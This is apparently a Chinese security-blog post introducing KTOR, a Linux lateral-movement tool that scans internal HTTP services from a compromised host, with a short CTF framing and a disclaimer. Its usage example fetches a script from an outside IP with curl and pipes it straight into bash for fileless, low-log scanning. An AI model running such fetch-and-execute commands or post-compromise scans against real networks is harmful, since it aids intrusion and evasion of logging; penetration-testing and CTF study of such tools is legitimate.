KTOR:高效的Linux横向移动与无文件落地HTTP服务扫描工具

2025-02-13 32 0

地址:https://github.com/MartinxMax/KTOR

简介

KTOR 是一款专为 Linux 横向渗透设计的工具。通过该工具,您可以快速扫描内部 HTTP 服务,以便进一步进行网络渗透,且实现无文件落地扫描。

在CTF中通常需要利用本地其他端口HTTP服务或其他主机的HTTP服务来横向移动权限提升。

在获取靶机低权限后通常需要对内部网络进一步探测,而且通过端口转发后再扫描过于耗费时间,为了解决这一缺陷,KTOR来预先探测存在HTTP服务的机器,利用curl命令实现无文件落地扫描,减少日志产生。

使用方法

$ ./ktor.sh -h

KTOR:高效的Linux横向移动与无文件落地HTTP服务扫描工具插图

扫描本地主机HTTP服务

$ curl http://10.10.16.28/ktor.sh|bash -s -- -l -p all

KTOR:高效的Linux横向移动与无文件落地HTTP服务扫描工具插图1

指定网卡扫描内网HTTP服务

KTOR:高效的Linux横向移动与无文件落地HTTP服务扫描工具插图2


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

甲方安全何时需要自研安全产品?安全平台工程团队的价值与落地策略
Burpsuite基础使用教程
Kali linux hping3基础使用方法
DouCo DouPHP 安全漏洞(CVE-2024-57599)
9万个WordPress站点面临本地文件包含漏洞攻击
从中国视角看 NSA(方程式组织)的 TTP(攻击套路)

发布评论